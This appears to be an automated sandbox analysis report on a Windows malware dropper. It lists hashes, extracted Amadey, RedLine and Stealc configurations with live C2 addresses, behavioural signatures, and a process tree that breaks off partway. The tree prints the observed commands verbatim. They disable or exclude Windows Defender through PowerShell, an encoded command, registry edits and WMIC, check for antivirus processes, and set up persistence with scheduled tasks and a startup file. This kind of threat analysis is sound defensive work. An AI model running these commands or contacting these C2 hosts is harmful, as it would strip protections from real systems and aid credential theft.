Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-08-2024 07:18

General

  • Target

    5ac9dab592f31a73eea78974955c068529786024980c27ab78ccf6c203c25957.exe

  • Size

    1.8MB

  • MD5

    68e83bc418bd309ebc761de8aca73d8b

  • SHA1

    95aed793b7dbc35e0f3b51abc4279e20f8c134fd

  • SHA256

    5ac9dab592f31a73eea78974955c068529786024980c27ab78ccf6c203c25957

  • SHA512

    4f24cc83c8280135684065157f6a819e19fdbaa451d8b9cd11d76160f074fd226ba8a4b1d524efebb2e1456d18385db9bd08a597bbebf8436ed66dc1d60d4a9e

  • SSDEEP

    49152:cYccLIGlUIE+TsVdA0qEFzgFoQAStdkDu2XR:DcKaITTQdAwFzgFoutdkVR

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

20.52.165.210:39030

Extracted

Family

redline

C2

185.215.113.67:21405

Extracted

Family

stealc

Botnet

default

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

redline

Botnet

BUY TG @FATHEROFCARDERS

C2

45.66.231.214:9932

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 31 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3256
      • C:\Users\Admin\AppData\Local\Temp\5ac9dab592f31a73eea78974955c068529786024980c27ab78ccf6c203c25957.exe
        "C:\Users\Admin\AppData\Local\Temp\5ac9dab592f31a73eea78974955c068529786024980c27ab78ccf6c203c25957.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4820
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4264
          • C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4800
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:4768
            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:988
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4200
                • C:\Users\Admin\AppData\Roaming\FqFgHbAnCH.exe
                  "C:\Users\Admin\AppData\Roaming\FqFgHbAnCH.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2480
                • C:\Users\Admin\AppData\Roaming\B5bs8vhNYO.exe
                  "C:\Users\Admin\AppData\Roaming\B5bs8vhNYO.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:960
            • C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious use of WriteProcessMemory
              PID:4972
              • C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"
                5⤵
                • Executes dropped EXE
                PID:2648
            • C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe
              "C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:936
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2208
            • C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe
              "C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:564
            • C:\Users\Admin\AppData\Local\Temp\1000120101\rorukal.exe
              "C:\Users\Admin\AppData\Local\Temp\1000120101\rorukal.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Looks for VirtualBox Guest Additions in registry
              • Looks for VMWare Tools registry key
              • Executes dropped EXE
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Suspicious behavior: EnumeratesProcesses
              PID:2788
            • C:\Users\Admin\AppData\Local\Temp\1000123001\runtime.exe
              "C:\Users\Admin\AppData\Local\Temp\1000123001\runtime.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious use of WriteProcessMemory
              PID:1240
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2020
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2568
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa.exe opssvc.exe"
                  6⤵
                    PID:4820
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3836
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1720
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 40365
                    6⤵
                      PID:4240
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "HopeBuildersGeniusIslam" Sonic
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2224
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
                      6⤵
                        PID:1484
                      • C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
                        Beijing.pif s
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:3960
                        • C:\Users\Admin\AppData\Local\Temp\1000057001\0d65c66f97.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000057001\0d65c66f97.exe"
                          7⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1848
                        • C:\Users\Admin\AppData\Local\Temp\1000064001\kitty.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000064001\kitty.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:5560
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 508
                            8⤵
                            • Program crash
                            PID:5692
                        • C:\Users\Admin\AppData\Local\Temp\1000088101\1111.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000088101\1111.exe"
                          7⤵
                          • UAC bypass
                          • Windows security bypass
                          • Executes dropped EXE
                          • Windows security modification
                          • Checks whether UAC is enabled
                          • Suspicious use of SetThreadContext
                          • System policy modification
                          PID:3124
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000088101\1111.exe" -Force
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4160
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                            8⤵
                              PID:988
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                              8⤵
                              • Drops startup file
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1864
                              • C:\Users\Admin\Pictures\qQvcQR6F1qjTjcmxpYBMPMGN.exe
                                "C:\Users\Admin\Pictures\qQvcQR6F1qjTjcmxpYBMPMGN.exe"
                                9⤵
                                • Executes dropped EXE
                                PID:868
                                • C:\Users\Admin\AppData\Local\Temp\7zS37A0.tmp\Install.exe
                                  .\Install.exe
                                  10⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5568
                                  • C:\Users\Admin\AppData\Local\Temp\7zS39A4.tmp\Install.exe
                                    .\Install.exe /ydidGcglc "385104" /S
                                    11⤵
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Enumerates system info in registry
                                    PID:5572
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      12⤵
                                        PID:5548
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          13⤵
                                          • Indirect Command Execution
                                          PID:5700
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            14⤵
                                              PID:5844
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                15⤵
                                                  PID:5816
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              13⤵
                                              • Indirect Command Execution
                                              PID:4572
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                14⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5728
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  15⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1692
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                              13⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:3936
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                14⤵
                                                  PID:2464
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    15⤵
                                                      PID:4220
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                  13⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:72
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                    14⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1644
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      15⤵
                                                        PID:5260
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    13⤵
                                                    • Indirect Command Execution
                                                    PID:1452
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      14⤵
                                                        PID:4992
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          15⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5424
                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            16⤵
                                                              PID:4872
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                      12⤵
                                                      • Indirect Command Execution
                                                      PID:6032
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        13⤵
                                                          PID:2348
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            14⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5988
                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                              15⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4868
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "bPUvzXzfJRZdhTmsKY" /SC once /ST 07:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS39A4.tmp\Install.exe\" wc /EdidHcA 385104 /S" /V1 /F
                                                        12⤵
                                                        • Drops file in Windows directory
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:5608
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1012
                                                        12⤵
                                                        • Program crash
                                                        PID:6060
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                8⤵
                                                  PID:5276
                                              • C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
                                                "C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3840
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /d y /t 5
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:424
                                        • C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1092
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAAxADIANQAwADAAMQBcAFUAawBvAGQAYgBjAGQAYwBsAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADAAMQAyADUAMAAwADEAXABVAGsAbwBkAGIAYwBkAGMAbAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATgB2AGEAdQByAG4AaABxAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AdgBhAHUAcgBuAGgAcQAuAGUAeABlAA==
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6004
                                          • C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000125001\Ukodbcdcl.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            PID:3020
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
                                      2⤵
                                        PID:1648
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
                                          3⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2360
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit
                                        2⤵
                                        • Drops startup file
                                        • System Location Discovery: System Language Discovery
                                        PID:2664
                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                      C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                      1⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:940
                                    • C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
                                      C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:2224
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5560 -ip 5560
                                      1⤵
                                        PID:4796
                                      • C:\Users\Admin\AppData\Local\Temp\7zS39A4.tmp\Install.exe
                                        C:\Users\Admin\AppData\Local\Temp\7zS39A4.tmp\Install.exe wc /EdidHcA 385104 /S
                                        1⤵
                                        • Executes dropped EXE
                                        • Drops desktop.ini file(s)
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        PID:2440
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          2⤵
                                            PID:4796
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              3⤵
                                              • Indirect Command Execution
                                              PID:5560
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3848
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:4996
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                3⤵
                                                • Indirect Command Execution
                                                PID:896
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  4⤵
                                                    PID:3564
                                                    • \??\c:\windows\SysWOW64\reg.exe
